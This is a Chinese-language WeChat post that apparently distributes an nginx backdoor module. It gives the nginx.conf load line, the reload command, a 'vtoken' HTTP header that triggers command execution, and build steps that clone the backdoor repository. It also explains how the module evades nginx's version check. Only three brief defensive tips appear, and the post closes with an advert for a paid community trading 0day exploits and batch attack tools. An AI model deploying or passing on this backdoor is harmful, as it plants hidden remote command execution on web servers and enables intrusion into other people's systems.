点击上方「蓝字」,关注我们
免责声明
文章正文
使用方式
测试环境:Nginx 1.18.0
下载测试程序 releases
将下载的so放至目标服务器上,修改 nginx.conf 配置文件在第一行添加以下内容,path为路径
load_module path/ngx_http_cre_module.so;
然后重载nginx
nignx -s reload
POST HTTP header vtoken: whoami
(测试程序只允许使用 whoami
命令)
如果无结果返回,可尝试增加header数量
编译方式
wget https://nginx.org/download/nginx-1.18.0.tar.gz
tar -zxvf nginx-1.18.0.tar.gz
cd nginx-1.18.0
git clone https://github.com/veo/nginx_shell.git
./configure --with-compat --add-dynamic-module=./nginx_shell/
make modules
编译后的so文件位于 nginx-1.18.0/objs/ngx_http_cre_module.so
技术特点
1. 无需临时编译(传统的 nignx so backdoor 需要临时编译)
2. 兼容 1.9.11 以后的所有版本
3. 无需额外组件支持
技术原理
nginx module 支持动态加载so,通过 __attribute ((constructor))的方式绕过nginx module version check,可以编译出适应所有nginx版本的module。使用header_filter可以取得命令执行的参数,通过body_filter可以返回命令执行后的结果
防御加固方案
1. 监测Nginx Module的加载,Nginx进程的行为
2. 查杀落地文件
3. 收敛 nignx -s reload 权限
工具获取,公众号后台回复 20240618 领取
知识星球
高质量漏洞利用工具、最新漏洞POC/EXP分享社区,日常更新一个0Day/Nday/1day及对应漏洞的批量利用工具,内部POC分享,星球不定时更新内外网攻防渗透技巧等。分享行业最新资讯,交流解答各类技术问题。
Fofa永久高级会员,助力挖洞 常态化更新最新的漏洞POC/EXP 常态化更新未公开、半公开漏洞POC 常态化更新优质外网打点、内网渗透工具 常态化更新安全资讯 开放交流环境,解决成员问题
点个「在看」,你最好看
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...